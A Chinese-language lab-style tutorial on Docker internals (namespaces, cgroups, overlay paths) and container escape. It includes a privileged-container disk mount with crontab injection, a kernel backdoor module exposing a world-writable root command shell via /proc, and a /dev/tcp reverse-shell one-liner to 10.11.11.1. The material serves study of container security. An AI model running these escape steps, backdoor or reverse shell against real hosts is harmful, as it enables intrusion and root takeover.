参照从0到1的虚拟机逃逸三部曲,实现了一个通过linux内核后门对docker逃逸的例子。
sudo apt install -f docker.io
docker pull ubuntu:18.04
原理
docker原理主要是两大隔离:
- 控制隔离:依赖于linux内核的namespace
- 资源隔离:依赖于linux内核的Cgroup实现
namespace
docker中的sleep进程,pid为14:
$ docker container run -it ubuntu:18.04 bash
root@a668c55cb477:/# sleep 2000 &
[1] 14
root@a668c55cb477:/# ps | grep sleep
14 pts/0 00:00:00 sleep
但其实这个sleep进程在docker外也能查看到,但是pid为194833:
xuanxuan@ubuntu:~$ ps -ef | grep sleep
root 194833 194776 0 01:33 pts/0 00:00:00 sleep 2000
xuanxuan 194845 194838 0 01:33 pts/8 00:00:00 grep --color=auto sleep
可通过/proc/194833/ns目录观察到此进程的namespace,的确与外部进程不同:
xuanxuan@ubuntu:~$ sudo ls -al /proc/194833/ns
[sudo] password for xuanxuan:
total 0
dr-x--x--x 2 root root 0 Jun 18 01:34 .
dr-xr-xr-x 9 root root 0 Jun 18 01:33 ..
lrwxrwxrwx 1 root root 0 Jun 18 01:35 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 ipc -> 'ipc:[4026532704]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 mnt -> 'mnt:[4026532702]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 net -> 'net:[4026532707]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 pid -> 'pid:[4026532705]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 pid_for_children -> 'pid:[4026532705]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 time -> 'time:[4026531834]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 time_for_children -> 'time:[4026531834]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 user -> 'user:[4026531837]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 uts -> 'uts:[4026532703]'
xuanxuan@ubuntu:~$ ls -al /proc/self/ns
total 0
dr-x--x--x 2 xuanxuan xuanxuan 0 Jun 18 01:35 .
dr-xr-xr-x 9 xuanxuan xuanxuan 0 Jun 18 01:35 ..
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 ipc -> 'ipc:[4026531839]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 mnt -> 'mnt:[4026531840]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 net -> 'net:[4026531992]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 pid -> 'pid:[4026531836]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 pid_for_children -> 'pid:[4026531836]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 time -> 'time:[4026531834]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 time_for_children -> 'time:[4026531834]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 user -> 'user:[4026531837]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 uts -> 'uts:[4026531838]'
所以docker容器里的进程,在docker宿主机上看来是namespace特殊的进程。这和qemu,vmware等虚拟机不同,这种完全虚拟化的方案,在外部看来只有虚拟机进程本身,在外部不能直接看到内部进程信息。
Cgroup
有一个神奇的文件系统类型是cgroup:
$ mount | grep cgroup
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755,inode64)
cgroup2 on /sys/fs/cgroup/unified type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/misc type cgroup (rw,nosuid,nodev,noexec,relatime,misc)
在这个文件系统中的目录下,新建空的文件夹,会自动生成一些文件:
$ cd /sys/fs/cgroup/cpu
$ sudo mkdir slow_cpu
$ cd slow_cpu
$ ls
cgroup.clone_children cpuacct.usage_percpu_sys cpu.shares
cgroup.procs cpuacct.usage_percpu_user cpu.stat
cpuacct.stat cpuacct.usage_sys cpu.uclamp.max
cpuacct.usage cpuacct.usage_user cpu.uclamp.min
cpuacct.usage_all cpu.cfs_period_us notify_on_release
cpuacct.usage_percpu cpu.cfs_quota_us tasks
每新建的一个文件夹代表一种配置,需要用root权限修改其中的配置文件。以下改法使当前配置下的进程最多只能使用10%的CPU(每100000微秒的周期内最多运行10000微秒):
$ sudo su
$ echo 100000 > ./cpu.cfs_period_us
$ echo 10000 > ./cpu.cfs_quota_us
创建一个死循环占用CPU的进程,top命令观察CPU占用几乎为100%:
xuanxuan@ubuntu:~$ while true ; do echo 1 > /dev/null ; done &
[1] 195005
xuanxuan@ubuntu:~$ top
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
195005 xuanxuan 20 0 11140 2528 624 R 98.7 0.0 0:11.20 bash
将此死循环进程号加入刚才创建的慢CPU配置文件中,然后再次观察CPU占用下降为10%:
xuanxuan@ubuntu:~$ sudo su -c "echo 195005 > /sys/fs/cgroup/cpu/slow_cpu/tasks"
xuanxuan@ubuntu:~$ top
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
195005 xuanxuan 20 0 11140 2528 624 R 10.0 0.0 2:11.88 bash
技巧
判断内外
根目录下的.dockerenv文件:
root@a668c55cb477:/# ls -al /
total 72
drwxr-xr-x 1 root root 4096 Jun 18 08:33 .
drwxr-xr-x 1 root root 4096 Jun 18 08:33 ..
-rwxr-xr-x 1 root root 0 Jun 18 08:33 .dockerenv
1号进程的cgroup信息:
root@a668c55cb477:/# cat /proc/1/cgroup
13:misc:/
12:blkio:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
11:pids:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
10:perf_event:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
9:net_cls,net_prio:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
8:memory:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
7:rdma:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
6:devices:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
5:cpu,cpuacct:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
4:cpuset:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
3:hugetlb:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
2:freezer:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
1:name=systemd:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
0::/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
mount 信息:
root@a668c55cb477:/# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/BGPXKTWJNHKOUJXU6Q376NWVOL:/var/lib/docker/overlay2/l/Q23MHYI2YS55FM6SSF64IX4ZSD,upperdir=/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/diff,workdir=/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755,inode64)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/misc type cgroup (rw,nosuid,nodev,noexec,relatime,misc)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/sda5 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro)
/dev/sda5 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro)
/dev/sda5 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro)
devpts on /dev/console type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
文件系统
在docker内的文件系统,可以直接在宿主机的文件系统中找到么?可以!这里我先在docker中新建一个文件:
root@a668c55cb477:/# echo nihao123 > /xuanxuan
root@a668c55cb477:/# ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var xuanxuan
root@a668c55cb477:/# cat xuanxuan
nihao123
然后可以查看容器内的mount信息:
root@a668c55cb477:/# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/BGPXKTWJNHKOUJXU6Q376NWVOL:/var/lib/docker/overlay2/l/Q23MHYI2YS55FM6SSF64IX4ZSD,upperdir=/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/diff,workdir=/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/work)
重点关注upperdir或者workdir,将work或者diff换成merged,即为其在宿主机的目录
/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/merged
可在宿主机上查看到刚才在docker新建的文件:
root@ubuntu:/# cd var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/merged/
root@ubuntu:/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/merged# ls
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr xuanxuan
root@ubuntu:/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/merged# cat xuanxuan
nihao123
简单逃逸
privileged
--privileged参数使得docker容器可以访问绝大部分硬件外设,导致可以直接挂载宿主机磁盘完成逃逸:
$ docker container run --privileged -it ubuntu:18.04 bash
root@f19b37b45a9c:/# ls /dev
autofs kmsg mcelog sg1 tty2 tty39 tty58 ttyS19 ttyprintk vcsu1
bsg lightnvm media0 shm tty20 tty4 tty59 ttyS2 udmabuf vcsu2
btrfs-control loop-control mem snapshot tty21 tty40 tty6 ttyS20 uhid vcsu3
bus loop0 midi snd tty22 tty41 tty60 ttyS21 uinput vcsu4
console loop1 mqueue sr0 tty23 tty42 tty61 ttyS22 urandom vcsu5
core loop10 net stderr tty24 tty43 tty62 ttyS23 userio vcsu6
cpu loop11 null stdin tty25 tty44 tty63 ttyS24 vcs vfio
cpu_dma_latency loop12 nvram stdout tty26 tty45 tty7 ttyS25 vcs1 vga_arbiter
cuse loop13 port tty tty27 tty46 tty8 ttyS26 vcs2 vhci
dma_heap loop14 ppp tty0 tty28 tty47 tty9 ttyS27 vcs3 vhost-net
dmmidi loop15 psaux tty1 tty29 tty48 ttyS0 ttyS28 vcs4 vhost-vsock
dri loop16 ptmx tty10 tty3 tty49 ttyS1 ttyS29 vcs5 video0
ecryptfs loop2 pts tty11 tty30 tty5 ttyS10 ttyS3 vcs6 video1
fb0 loop3 random tty12 tty31 tty50 ttyS11 ttyS30 vcsa vmci
fd loop4 rfkill tty13 tty32 tty51 ttyS12 ttyS31 vcsa1 vsock
full loop5 rtc0 tty14 tty33 tty52 ttyS13 ttyS4 vcsa2 zero
fuse loop6 sda tty15 tty34 tty53 ttyS14 ttyS5 vcsa3 zfs
hidraw0 loop7 sda1 tty16 tty35 tty54 ttyS15 ttyS6 vcsa4
hpet loop8 sda2 tty17 tty36 tty55 ttyS16 ttyS7 vcsa5
hwrng loop9 sda5 tty18 tty37 tty56 ttyS17 ttyS8 vcsa6
input mapper sg0 tty19 tty38 tty57 ttyS18 ttyS9 vcsu
root@f19b37b45a9c:/# mkdir escape
root@f19b37b45a9c:/# mount /dev/sda5 /escape/
root@f19b37b45a9c:/# ls /escape/
'I'$'\004' boot dev flag lib lib64 lost+found mnt proc run snap swapfile tmp var
bin cdrom etc home lib32 libx32 media opt root sbin srv sys usr
root@f19b37b45a9c:/# cat /escape/flag
flag{this_is_the_flag}
为什么是sda5?
答:在宿主机上查看mount信息,可知sda5即根文件系统所在磁盘分区:
xuanxuan@ubuntu:~$ mount | grep sda
/dev/sda5 on / type ext4
/dev/sda1 on /boot/efi type vfat
如果没有宿主机shell怎么办?sdxx之类的,挨个试!
如何执行命令?
方法必然是以宿主机的文件系统作为跳板,然后让宿主机执行代码。常见的办法是使用定时任务crontab,为此需要先知道宿主机上的普通用户:
xuanxuan@ubuntu:$ id
uid=1000(xuanxuan) gid=1000(xuanxuan) groups=1000(xuanxuan)
也可在docker中通过逃出去的/etc/passwd文件查看:
root@a668c55cb477:/# cat /escape/etc/passwd
root:x:0:0:root:/root:/bin/bash
...
xuanxuan:x:1000:1000:xuanxuan,,,:/home/xuanxuan:/bin/bash
...
ubuntu中全局的crontab落地文件为/etc/crontab,追加写入定时任务配置,即可等一分钟弹计算器:
root@f19b37b45a9c:/# echo "* * * * * xuanxuan DISPLAY=:0 /usr/bin/gnome-calculator" >> /escape/etc/crontab
内核态漏洞
在ubuntu 20.04完成
在以linux为底座的情况下,由于docker和宿主机共用linux内核,这使得逃逸过程可以退化为对linux内核漏洞的利用。例如使用内核函数call_usermodehelper拉起的用户态进程就直接是在宿主机正常namespace的root进程,在docker里如果能触发完成此过程,则完成逃逸。例如使用如下后门内核模块:
#include <linux/init.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
MODULE_LICENSE("GPL");
/*
 * kshell_write - write handler for the "kshell" proc entry.
 * @file:  open file the write was issued on (unused)
 * @ubuf:  user-space buffer holding the command line to run
 * @count: number of bytes in @ubuf
 * @ppos:  file position (unused)
 *
 * Copies the written bytes into a kernel buffer and hands them to
 * "/usr/bin/bash -c <command>" through call_usermodehelper().
 *
 * Returns @count on success, -EINVAL when the command does not fit in the
 * buffer, or -EFAULT when the user buffer cannot be read.
 */
static ssize_t kshell_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos)
{
	char buf[0x1000];
	char *cmd_argv[] = {"/usr/bin/bash", "-c", buf, NULL};

	/* Keep one byte free for the terminating NUL; refuse oversized writes
	 * instead of overflowing the on-stack buffer. */
	if (count >= sizeof(buf))
		return -EINVAL;

	/* copy_from_user() returns the number of bytes it could NOT copy. */
	if (copy_from_user(buf, ubuf, count))
		return -EFAULT;

	/* argv entries must be NUL-terminated C strings. */
	buf[count] = '\0';

	/* The helper's exit status is deliberately ignored: the write is
	 * reported as fully consumed whether or not the command succeeded. */
	call_usermodehelper("/usr/bin/bash", cmd_argv, NULL, UMH_WAIT_PROC);
	return count;
}
/*
 * File operations for the "kshell" proc entry. Only writes are handled;
 * every other operation is left unset. The table is used only inside this
 * file, so it is given internal linkage.
 */
static const struct proc_ops myops = {
	.proc_write = kshell_write
};
static int kshell_init(void)
{
printk(KERN_INFO "kernel shell, init!\n");
proc_create("kshell",0666,NULL,&myops);
return 0;
}
static void kshell_exit(void)
{
remove_proc_entry("kshell", NULL);
printk(KERN_INFO "kernel shell, exit!\n");
}
module_init(kshell_init);
module_exit(kshell_exit);
# Kbuild makefile for the out-of-tree kshell module.
# The object name must match the module source file: kshell.c -> kshell.ko,
# which is the file later loaded with insmod.
obj-m += kshell.o

# Neither target produces a file with its own name.
.PHONY: all clean

# Build against the headers of the currently running kernel.
# $(MAKE) is used instead of a literal "make" so that flags and the jobserver
# are passed down to the recursive invocation. Recipe lines start with a tab.
all:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
编译、insmod、并映射到docker容器中:
$ git clone https://github.com/xuanxuanblingbling/linux_kernel_module_exercise
$ cd linux_kernel_module_exercise/05.ksehll
$ make
$ sudo insmod kshell.ko
$ docker container run -v /proc/kshell:/kshell -it ubuntu:18.04 bash
不过在最后利用的形式上与内核提权有所差异:由于namespace的影响,不能直接通过返回用户态后执行/bin/sh的方式在docker中获得一个宿主机的shell,但可以出网弹shell:
root@03ea4622e658:/# echo "/usr/bin/bash -i >& /dev/tcp/10.11.11.1/8888 0>&1 &" > /kshell
也可以使用落地文件,将命令在本地回显:
root@03ea4622e658:/opt# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/6NRKJVEFBBGFB3UAOG4SELSIPD:/var/lib/docker/overlay2/l/Q23MHYI2YS55FM6SSF64IX4ZSD,upperdir=/var/lib/docker/overlay2/be01093928ed89406df771649c8249d89b77598b05639bca139673bea7bc2a4e/diff,workdir=/var/lib/docker/overlay2/be01093928ed89406df771649c8249d89b77598b05639bca139673bea7bc2a4e/work)
root@03ea4622e658:/# echo "id > /var/lib/docker/overlay2/be01093928ed89406df771649c8249d89b77598b05639bca139673bea7bc2a4e/merged/1.txt" > /kshell
root@03ea4622e658:/# cat 1.txt
uid=0(root) gid=0(root) groups=0(root)
还可以在宿主机上弹计算器(GUI程序不能使用root,要切回普通用户,卡了一晚上):
root@03ea4622e658:/# echo "su xuanxuan -c 'DISPLAY=:0 /usr/bin/gnome-calculator &'" > /kshell
复杂逃逸
内核态的利用一般仍归属于linux内核,并且看起来更多的逃逸都是与docker的使用、配置相关,在二进制上攻破docker守护进程本身并不常见,所以暂时搁置。
不过由于逃逸,所以在搭建题目上需要做队伍间隔离,一般三层:docker(deploy)-> qemu(flag)-> docker(attack):